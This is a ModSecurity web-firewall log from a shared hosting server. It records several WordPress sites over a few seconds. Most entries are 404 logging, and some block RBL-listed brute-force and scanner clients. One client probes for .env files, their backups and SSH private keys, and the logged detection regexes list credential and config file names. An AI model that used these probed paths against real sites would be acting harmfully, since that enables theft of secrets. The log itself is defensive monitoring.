[Tue May 26 16:49:57.634607 2026] [security2:error] [pid 823496:tid 823723] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB3Za08mrtyBNpA4PfNwAAAF8"]
[Tue May 26 16:49:57.658000 2026] [security2:error] [pid 817651:tid 817887] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB3NlGRCPPN1dS2y298wAAAO8"]
[Tue May 26 16:49:58.342583 2026] [security2:error] [pid 823496:tid 823681] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB3pa08mrtyBNpA4PfQgAAADU"]
[Tue May 26 16:50:00.093041 2026] [security2:error] [pid 823496:tid 823713] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB4Ja08mrtyBNpA4PfXQAAAFU"]
[Tue May 26 16:50:00.146267 2026] [security2:error] [pid 823496:tid 823500] [remote 154.66.198.148:54992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWB35a08mrtyBNpA4PfWwAAdwE"]
[Tue May 26 16:50:00.149778 2026] [security2:error] [pid 823496:tid 823706] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB3pa08mrtyBNpA4PfUAAAAE4"]
[Tue May 26 16:50:00.716255 2026] [security2:error] [pid 823496:tid 823630] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB4Ja08mrtyBNpA4PfZQAAAAI"]
[Tue May 26 16:50:01.602842 2026] [security2:error] [pid 823496:tid 823755] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB4Za08mrtyBNpA4PfdgAAAH8"]
[Tue May 26 16:50:01.859201 2026] [security2:error] [pid 817651:tid 817831] [client 62.60.130.233:60958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWB4dlGRCPPN1dS2y2-HwAAALc"]
[Tue May 26 16:50:02.034389 2026] [security2:error] [pid 817651:tid 817904] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB4NlGRCPPN1dS2y2-GQAAAQA"]
[Tue May 26 16:50:02.108741 2026] [security2:error] [pid 823496:tid 823645] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB4pa08mrtyBNpA4PfdwAAABE"]
[Tue May 26 16:50:02.192529 2026] [security2:error] [pid 817651:tid 817903] [client 62.60.130.233:56921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWB4tlGRCPPN1dS2y2-KQAAAP8"]
[Tue May 26 16:50:02.478551 2026] [security2:error] [pid 823496:tid 823692] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB4pa08mrtyBNpA4PfegAAAEA"]
[Tue May 26 16:50:02.535551 2026] [security2:error] [pid 817651:tid 817853] [client 117.198.37.168:52952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB4tlGRCPPN1dS2y2-LAAAAM0"]
[Tue May 26 16:50:02.535723 2026] [security2:error] [pid 817651:tid 817853] [client 117.198.37.168:52952] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB4tlGRCPPN1dS2y2-LAAAAM0"]
[Tue May 26 16:50:03.384572 2026] [security2:error] [pid 823496:tid 823669] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB45a08mrtyBNpA4PfggAAACk"]
[Tue May 26 16:50:04.092831 2026] [security2:error] [pid 823496:tid 823688] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB5Ja08mrtyBNpA4PfjAAAADw"]
[Tue May 26 16:50:04.218734 2026] [security2:error] [pid 823496:tid 823647] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB4pa08mrtyBNpA4PffwAAABM"]
[Tue May 26 16:50:04.420515 2026] [security2:error] [pid 823496:tid 823726] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB5Ja08mrtyBNpA4PfjgAAAGI"]
[Tue May 26 16:50:04.793739 2026] [security2:error] [pid 823496:tid 823690] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB5Ja08mrtyBNpA4PflAAAAD4"]
[Tue May 26 16:50:05.918808 2026] [security2:error] [pid 823496:tid 823713] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB5Ja08mrtyBNpA4PfkwAAAFU"]
[Tue May 26 16:50:06.472905 2026] [security2:error] [pid 823496:tid 823727] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB5pa08mrtyBNpA4PfqwAAAGM"]
[Tue May 26 16:50:06.838954 2026] [security2:error] [pid 823496:tid 823670] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB5pa08mrtyBNpA4PfsgAAACo"]
[Tue May 26 16:50:07.720394 2026] [security2:error] [pid 823496:tid 823644] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB55a08mrtyBNpA4PfwAAAABA"]
[Tue May 26 16:50:07.811326 2026] [security2:error] [pid 817651:tid 817882] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB5tlGRCPPN1dS2y2-TgAAAOo"]
[Tue May 26 16:50:08.068234 2026] [security2:error] [pid 823496:tid 823678] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4PfxQAAADI"]
[Tue May 26 16:50:08.429150 2026] [security2:error] [pid 823496:tid 823712] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4PfzQAAAFQ"]
[Tue May 26 16:50:08.814398 2026] [security2:error] [pid 823496:tid 823737] [client 5.255.99.53:40102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/app/.env"] [unique_id "ahWB6Ja08mrtyBNpA4Pf1AAAAG0"]
[Tue May 26 16:50:08.815330 2026] [security2:error] [pid 817651:tid 817880] [client 5.255.99.53:40132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.ssh/id_dsa"] [unique_id "ahWB6NlGRCPPN1dS2y2-XgAAAOg"]
[Tue May 26 16:50:08.817430 2026] [security2:error] [pid 823496:tid 823698] [client 5.255.99.53:40074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/api/.env"] [unique_id "ahWB6Ja08mrtyBNpA4Pf1QAAAEY"]
[Tue May 26 16:50:08.819701 2026] [security2:error] [pid 823496:tid 823689] [client 5.255.99.53:40046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.env.bak"] [unique_id "ahWB6Ja08mrtyBNpA4Pf0wAAAD0"]
[Tue May 26 16:50:08.839523 2026] [security2:error] [pid 823496:tid 823639] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4Pf0QAAAAs"]
[Tue May 26 16:50:08.867364 2026] [security2:error] [pid 817651:tid 817830] [client 5.255.99.53:40144] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6NlGRCPPN1dS2y2-XwAAALY"]
[Tue May 26 16:50:08.885869 2026] [security2:error] [pid 817651:tid 817904] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6NlGRCPPN1dS2y2-YgAAAQA"]
[Tue May 26 16:50:08.888095 2026] [security2:error] [pid 817651:tid 817897] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6NlGRCPPN1dS2y2-YwAAAPk"]
[Tue May 26 16:50:08.900033 2026] [security2:error] [pid 823496:tid 823677] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4Pf1wAAADE"]
[Tue May 26 16:50:08.914788 2026] [security2:error] [pid 817651:tid 817811] [client 5.255.99.53:40294] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6NlGRCPPN1dS2y2-ZAAAAKM"]
[Tue May 26 16:50:09.005434 2026] [security2:error] [pid 823496:tid 823664] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4Pf3QAAACQ"]
[Tue May 26 16:50:09.140736 2026] [security2:error] [pid 823496:tid 823642] [client 47.128.59.60:10546] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/robots.txt"] [unique_id "ahWB6Za08mrtyBNpA4Pf4QAAAA4"]
[Tue May 26 16:50:09.286005 2026] [security2:error] [pid 823496:tid 823674] [client 5.255.99.53:40074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.env"] [unique_id "ahWB6Za08mrtyBNpA4Pf6AAAAC4"]
[Tue May 26 16:50:09.288566 2026] [security2:error] [pid 817651:tid 817796] [client 5.255.99.53:40132] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-ZwAAAJQ"]
[Tue May 26 16:50:09.299148 2026] [security2:error] [pid 823496:tid 823750] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4Pf4gAAAHo"]
[Tue May 26 16:50:09.335268 2026] [security2:error] [pid 817651:tid 817864] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-awAAANg"]
[Tue May 26 16:50:09.338710 2026] [security2:error] [pid 817651:tid 817793] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-agAAAJE"]
[Tue May 26 16:50:09.338903 2026] [security2:error] [pid 823496:tid 823635] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4Pf7QAAAAc"]
[Tue May 26 16:50:09.338919 2026] [security2:error] [pid 817651:tid 817832] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-bAAAALg"]
[Tue May 26 16:50:09.349241 2026] [security2:error] [pid 817651:tid 817784] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-bgAAAIg"]
[Tue May 26 16:50:09.371545 2026] [security2:error] [pid 823496:tid 823665] [client 5.255.99.53:40222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.env.backup"] [unique_id "ahWB6Za08mrtyBNpA4Pf8gAAACU"]
[Tue May 26 16:50:09.374949 2026] [security2:error] [pid 817651:tid 817883] [client 5.255.99.53:39890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.env.old"] [unique_id "ahWB6dlGRCPPN1dS2y2-cQAAAOs"]
[Tue May 26 16:50:09.401059 2026] [security2:error] [pid 823496:tid 823629] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4Pf8QAAAAE"]
[Tue May 26 16:50:09.769396 2026] [security2:error] [pid 817651:tid 817800] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6dlGRCPPN1dS2y2-cwAAAJg"]
[Tue May 26 16:50:09.770910 2026] [security2:error] [pid 823496:tid 823729] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4Pf9wAAAGU"]
[Tue May 26 16:50:09.813678 2026] [security2:error] [pid 823496:tid 823647] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB6Ja08mrtyBNpA4PfygAAABM"]
[Tue May 26 16:50:09.936876 2026] [security2:error] [pid 817651:tid 817906] [client 5.255.99.53:40144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWB6dlGRCPPN1dS2y2-eQAAAQI"]
[Tue May 26 16:50:09.939108 2026] [security2:error] [pid 823496:tid 823692] [client 5.255.99.53:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/backend/.env"] [unique_id "ahWB6Za08mrtyBNpA4Pf_gAAAEA"]
[Tue May 26 16:50:09.939239 2026] [security2:error] [pid 823496:tid 823628] [client 5.255.99.53:39914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.com"] [uri "/public/.env"] [unique_id "ahWB6Za08mrtyBNpA4Pf_AAAAAA"]
[Tue May 26 16:50:10.014124 2026] [security2:error] [pid 823496:tid 823723] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4Pf_wAAAF8"]
[Tue May 26 16:50:10.024933 2026] [security2:error] [pid 823496:tid 823731] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4PgAgAAAGc"]
[Tue May 26 16:50:10.025098 2026] [security2:error] [pid 823496:tid 823705] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6Za08mrtyBNpA4PgAwAAAE0"]
[Tue May 26 16:50:10.077396 2026] [security2:error] [pid 823496:tid 823662] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgBQAAACI"]
[Tue May 26 16:50:10.105848 2026] [security2:error] [pid 823496:tid 823694] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgCAAAAEI"]
[Tue May 26 16:50:10.123757 2026] [security2:error] [pid 823496:tid 823678] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB6pa08mrtyBNpA4PgDAAAADI"]
[Tue May 26 16:50:10.144334 2026] [security2:error] [pid 817651:tid 817798] [client 20.206.111.149:28222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWB6tlGRCPPN1dS2y2-fQAAAJY"]
